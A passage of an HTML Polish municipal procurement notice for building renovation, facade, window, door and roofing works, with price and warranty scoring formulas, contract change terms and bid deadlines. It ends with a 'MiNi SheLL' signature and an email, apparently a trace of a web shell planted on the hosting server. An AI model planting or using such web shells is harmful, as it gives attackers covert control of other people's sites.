Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres części II obejmuje:<br/>a.	Remont budynku co najmniej w zakresie:<br/>i.	przygotowanie podłoża,<br/>ii.	wykonanie podsypki piaskowej zagęszczanej mechanicznie,<br/>iii.	chudy beton B10-gr.10 cm,<br/>iv.	izolacja przeciwwilgociowa - folia budowlana,<br/>v.	wylewka betonowa - gr. 6-8 cm,<br/>vi.	ułożenie gresu,<br/>vii.	ocieplenie stropu wełną mineralną gr.25 cm,<br/>viii.	folie paroizalacyjną,<br/>ix.	wykonanie podwieszanego sufitu systemowego z wypełnienie g-k.<br/>b.	Ocieplenie elewacji budynku co najmniej w zakresie:<br/>i.	ocieplenie ścian styropianem gr.20 cm,<br/>ii.	ocieplenie ościeży styropianem gr. 2 cm,<br/>iii.	przyklejenie (wtopienie) siatki zbrojeniowej – 160g/m2,<br/>iv.	szpachlowanie,<br/>v.	ochrona wszystkich krawędzi kątownikiem aluminiowym z siatką,<br/>vi.	wykonanie wyprawy tynkarskiej cienkowarstwowym tynkiem silikatowo - sylikonowym barwionym w masie,<br/>vii.	zabezpieczenie otworów folią ochronną,<br/>viii.	montaż i demontaż rusztowań,<br/>ix.	demontaż parapetów,<br/>x.	montaż parapetów,<br/>xi.	oczyszczenie terenu po wykonanych pracach.<br/>c.	Wymianę stolarki okiennej – okna w ilości 5 sztuk co najmniej o następujących parametrach:<br/>i.	szerokość 2020mm x wysokość 1420mm,<br/>ii.	ID7000 rama 70mm skrzydło 77mm STANDARD<br/>iii.	kolor biały, uszczelka szara,<br/>iv.	współczynnik U 0,9<br/>v.	słupek 170 x 41 pionowy x 1,<br/>vi.	okucie: UR- Uchylno Rozwierne,<br/>vii.	kolor osłonek: biały osłonki,<br/>viii.	klamka: klamka standard T,<br/>ix.	ramka: aluminium.<br/>d.	Wymianę stolarki drzwiowej – drzwi w ilości 3 sztuk co najmniej o następujących parametrach:<br/>i.	wymiar 110 x 210 cm,<br/>ii.	kierunek otwierania: 2x lewe do wewnątrz – drzwi oszklone, 1x lewe do zewnątrz,<br/>iii.	kolor sipo,<br/>iv.	materiał: dąb lub sosna.<br/>Jeżeli gdziekolwiek w SWZ, Zamawiający wskazał konkretne nazwy materiałów lub zawarł inne treści, które w sposób bezpośredni lub pośredni wskazują lub mogą wskazywać na konkretny wyrób, oznacza to, że zrobił to w celu doprecyzowania opisu przedmiotu zamówienia i określają minimalne oczekiwania co do jakości produktów, które mają być użyte do wykonania przedmiotu zamówienia.<br/>Zamawiający przy przygotowaniu oferty dopuszcza zastosowanie materiałów równoważnych, tj. o parametrach technicznych i użytkowych nie gorszych niż przywoływane w opisie przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111300-1 - Roboty rozbiórkowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45262300-4 - Betonowanie</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45432100-5 - Kładzenie i wykładanie podłóg</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45421146-9 - Instalowanie sufitów podwieszanych</p> <p class="mb-0">45443000-4 - Roboty elewacyjne</p> <p class="mb-0">45262100-2 - Roboty przy wznoszeniu rusztowań</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-01-13</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie stosować następujące kryteria oceny ofert:<br/>	Cena – 60%,<br/>	Gwarancja – 40%.<br/>2.Punkty przyznane w ramach kryterium „Cena” (C) zostaną obliczone według wzoru:<br/>C=C_min/C_b ×60pkt<br/><br/>gdzie:<br/>	C – liczba punktów, którą uzyskała badana oferta w kryterium „Cena”,<br/>	Cmin – cena (cena ofertowa brutto) najtańszej oferty spośród ofert nieodrzuconych,<br/>	Cb – cena (cena ofertowa brutto) badanej oferty spośród ofert nieodrzuconych.<br/>Maksymalnie można uzyskać 60 punktów. Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>3.Punkty przyznane w ramach kryterium „Gwarancja” (G) zostaną przyznane według wzoru:<br/>G=G_z/G_max ×40pkt<br/>gdzie:<br/>	G – liczba punktów, którą uzyskała badana oferta w kryterium „Gwarancja”,<br/>	Gz – okres gwarancji zadeklarowany w ocenianej ofercie,<br/>	Gmax – najdłuższy możliwy okres gwarancji (60 miesięcy).<br/>W tym kryterium można uzyskać maksymalnie 40 punktów Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>UWAGA:<br/>	Najkrótszy możliwy okres gwarancji wymagany przez Zamawiającego: 36 miesięcy.<br/>	Najdłuższy możliwy okres gwarancji uwzględniony do oceny ofert: 60 miesięcy.<br/>	Wykonawca może zaproponować okres gwarancji w przedziale od 36 do 60 miesięcy. Zaoferowany przez Wykonawcę okres gwarancji zostanie uwzględniony w umowie.<br/>	Wykonawca, który zaoferuje najkorzystniejszy okres gwarancji (60 miesięcy) otrzyma maksymalną ilość punktów – 40 punktów.<br/>	Wykonawca, który zaoferuje najmniej korzystny okres gwarancji (36 miesięcy) - otrzymuje 0 pkt.<br/>	W przypadku, gdy Wykonawca zaoferuje okres gwarancji dłuższy niż 60 miesięcy, to przy ocenie oferty brany będzie pod uwagę najdłuższy możliwy okres gwarancji uwzględniony do oceny ofert – 60 miesięcy.<br/>	Pozostali Wykonawcy (tj. Wykonawcy, którzy zaproponowali wartość pośrednią, pomiędzy wartością najkorzystniejszą a najmniej korzystną), otrzymują liczbę punktów (G) obliczoną wg powyższego wzoru.<br/>4.Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (P) wyliczona zgodnie z poniższym wzorem:<br/>P=C+G<br/>	gdzie:<br/>	P – łączna liczba punktów ocenianej oferty,<br/>	C – liczba punktów uzyskanych w ramach kryterium „Cena”,<br/>	G – liczba punktów uzyskanych w ramach kryterium „Gwarancja”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres części III obejmuje:<br/>a.	Wykonanie konstrukcji dachowych co najmniej w zakresie:<br/>i.	Konstrukcja więźby dachowej prefabrykowana drewniana, łączona na płytki – kształt i spadki dachu wg projektu (dźwigary wyprodukowane z tarcicy klasy C24, suszonego komorowo, czterostronnie struganego, impregnowanego),<br/>ii.	stężenia, okucia, elementy złączone,<br/>iii.	dźwig do montażu ,<br/>iv.	montaż na wieńcach żelbetonowych bezpośrednio (bez murłaty),<br/>v.	montaż,<br/>vi.	folia wiatro- izolacyjna,<br/>vii.	kontrłaty,<br/>viii.	łaty,<br/>ix.	pokrycie dachu- dachówka cementowa obróbki dachowe z blachy w kolorze pokrycia,<br/>x.	system odwodnienia PVC, rynny i rury spustowe - kolor grafit,<br/>xi.	podbitki na okapach i na podcieniach PVC – kolor grafit,<br/>b.	Wykonanie pokrycia dachowego co najmniej w zakresie:<br/>i.	folia wiatro- izolacyjna,<br/>ii.	kontrłaty,<br/>iii.	łaty,<br/>iv.	pokrycie dachu – dachówka cementowa,<br/>v.	obróbki dachowe z blachy w kolorze pokrycia,<br/>vi.	system odwodnienia PVC, rynny i rury spustowe.<br/>Jeżeli gdziekolwiek w SWZ, Zamawiający wskazał konkretne nazwy materiałów lub zawarł inne treści, które w sposób bezpośredni lub pośredni wskazują lub mogą wskazywać na konkretny wyrób, oznacza to, że zrobił to w celu doprecyzowania opisu przedmiotu zamówienia i określają minimalne oczekiwania co do jakości produktów, które mają być użyte do wykonania przedmiotu zamówienia.<br/>Zamawiający przy przygotowaniu oferty dopuszcza zastosowanie materiałów równoważnych, tj. o parametrach technicznych i użytkowych nie gorszych niż przywoływane w opisie przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45261100-5 - Wykonywanie konstrukcji dachowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45261210-9 - Wykonywanie pokryć dachowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-01-13</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie stosować następujące kryteria oceny ofert:<br/>	Cena – 60%,<br/>	Gwarancja – 40%.<br/>2.Punkty przyznane w ramach kryterium „Cena” (C) zostaną obliczone według wzoru:<br/>C=C_min/C_b ×60pkt<br/><br/>gdzie:<br/>	C – liczba punktów, którą uzyskała badana oferta w kryterium „Cena”,<br/>	Cmin – cena (cena ofertowa brutto) najtańszej oferty spośród ofert nieodrzuconych,<br/>	Cb – cena (cena ofertowa brutto) badanej oferty spośród ofert nieodrzuconych.<br/>Maksymalnie można uzyskać 60 punktów. Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>3.Punkty przyznane w ramach kryterium „Gwarancja” (G) zostaną przyznane według wzoru:<br/>G=G_z/G_max ×40pkt<br/>gdzie:<br/>	G – liczba punktów, którą uzyskała badana oferta w kryterium „Gwarancja”,<br/>	Gz – okres gwarancji zadeklarowany w ocenianej ofercie,<br/>	Gmax – najdłuższy możliwy okres gwarancji (60 miesięcy).<br/>W tym kryterium można uzyskać maksymalnie 40 punktów Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>UWAGA:<br/>	Najkrótszy możliwy okres gwarancji wymagany przez Zamawiającego: 36 miesięcy.<br/>	Najdłuższy możliwy okres gwarancji uwzględniony do oceny ofert: 60 miesięcy.<br/>	Wykonawca może zaproponować okres gwarancji w przedziale od 36 do 60 miesięcy. Zaoferowany przez Wykonawcę okres gwarancji zostanie uwzględniony w umowie.<br/>	Wykonawca, który zaoferuje najkorzystniejszy okres gwarancji (60 miesięcy) otrzyma maksymalną ilość punktów – 40 punktów.<br/>	Wykonawca, który zaoferuje najmniej korzystny okres gwarancji (36 miesięcy) - otrzymuje 0 pkt.<br/>	W przypadku, gdy Wykonawca zaoferuje okres gwarancji dłuższy niż 60 miesięcy, to przy ocenie oferty brany będzie pod uwagę najdłuższy możliwy okres gwarancji uwzględniony do oceny ofert – 60 miesięcy.<br/>	Pozostali Wykonawcy (tj. Wykonawcy, którzy zaproponowali wartość pośrednią, pomiędzy wartością najkorzystniejszą a najmniej korzystną), otrzymują liczbę punktów (G) obliczoną wg powyższego wzoru.<br/>4.Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (P) wyliczona zgodnie z poniższym wzorem:<br/>P=C+G<br/>	gdzie:<br/>	P – łączna liczba punktów ocenianej oferty,<br/>	C – liczba punktów uzyskanych w ramach kryterium „Cena”,<br/>	G – liczba punktów uzyskanych w ramach kryterium „Gwarancja”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenia Wykonawcy, w zakresie art. 108 ust.1 pkt 5 ustawy PZP, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (Dz. U. z 2020r. poz. 1076 ze zm.), z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 3 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Nie dotyczy</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Nie dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia i w takim przypadku ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego. Pełnomocnictwo powinno być załączone do oferty.<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o którym mowa w dziale XXI pkt 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw do wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie zmiany niniejszej umowy wymagają sporządzenia aneksu w formie pisemnej, pod rygorem nieważności. <br/>2.	Zgodnie z art. 455 ust. 1 pkt 1 ustawy Pzp Zamawiający przewiduje możliwość wprowadzenia zmian postanowień niniejszej umowy w stosunku do treści złożonej oferty, w przypadkach opisanych w niniejszym paragrafie.<br/>3.	Dopuszczalna jest zmiana przedmiotu zamówienia poprzez zmianę zakresu robót budowlanych przewidzianych w dokumentacji projektowej w przypadku: <br/>a.	konieczności wykonania robót zamiennych, których wykonanie ma na celu prawidłowe zrealizowanie przedmiotu zamówienia, a konieczność ich wykonania wynika z wad dokumentacji projektowej, <br/>b.	konieczności wykonania robót dodatkowych niezbędnych do prawidłowego wykonania przedmiotu umowy, które nie zostały przewidziane w dokumentacji projektowej przekazanej przez Zamawiającego – w zakresie wynagrodzenia oraz zakresu robót.<br/>4.	Dopuszczalna jest zmiana terminu wykonania umowy w przypadku: <br/>a.	wystąpienia okoliczności lub zdarzeń uniemożliwiających realizację w wyznaczonym terminie przedmiotu umowy, bez możliwości usunięcia lub likwidacji powyższych okoliczności lub zdarzeń, za które nie odpowiada Wykonawca<br/>b.	opóźnienie Zamawiającego w przekazaniu placu budowy;<br/>c.	zawieszenie lub przerwanie robót przez Zamawiającego;<br/>d.	wystąpienie wyjątkowo niepomyślnych warunków pogodowych i temperatur otoczenia, nie pozwalających na zachowanie parametrów technologicznych i jakościowych realizowanych robót,<br/>e.	wystąpienie siły wyższej, to znaczy niezależnego od stron losowego zdarzenia zewnętrznego o charakterze wyjątkowym, które było niemożliwe do przewidzenia w momencie zawarcia umowy i któremu nie można było zapobiec mimo dochowania należytej staranności. Siłą wyższą̨ nie są̨ w szczególności: deficyt sprzętowy, kadrowy, materiałowy, spory pracownicze, strajki, trudności finansowe ani też kumulacja tych czynników.<br/>5.	Zmiana umowy w zakresie terminów jest dopuszczalna stosownie do okresu trwania przeszkody.<br/>6.	Strona, która występuje z propozycją zmiany umowy, w oparciu o przedstawiony powyżej katalog zmian umowy zobowiązana jest do sporządzenia i uzasadnienia wniosku o taką zmianę. Zamawiający przewidział katalog zmian umowy, na które mogą powoływać się strony niniejszej umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/gmina_sedziejowice</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-30 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-29</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com